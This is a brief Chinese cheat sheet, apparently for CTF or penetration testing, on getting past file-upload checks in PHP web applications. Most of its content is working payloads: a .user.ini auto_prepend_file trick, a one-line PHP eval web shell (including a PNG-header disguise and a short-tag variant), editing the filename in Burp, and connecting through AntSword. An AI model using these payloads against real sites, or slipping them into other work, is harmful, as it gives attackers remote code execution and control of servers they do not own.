前端f12绕过：

f12 -> 删除部分参数

user.ini绕过：

上传 .user.ini 写入

auto_prepend_file=ym.png

上传 ym.png 一句话：

<?php @eval($_POST['caixukun']);?>

用蚁剑连接同目录下的php文件，密码为一句话木马

前端单单验证png文件：

上传ym.png

%PNG
<?php @eval($_POST['caixukun']);?>

burp抓包修改：

把 ym.png 修改为 ym.php

如果过滤了代码中的 php 那就用短标签：

<?=eval($_POST[1]);?>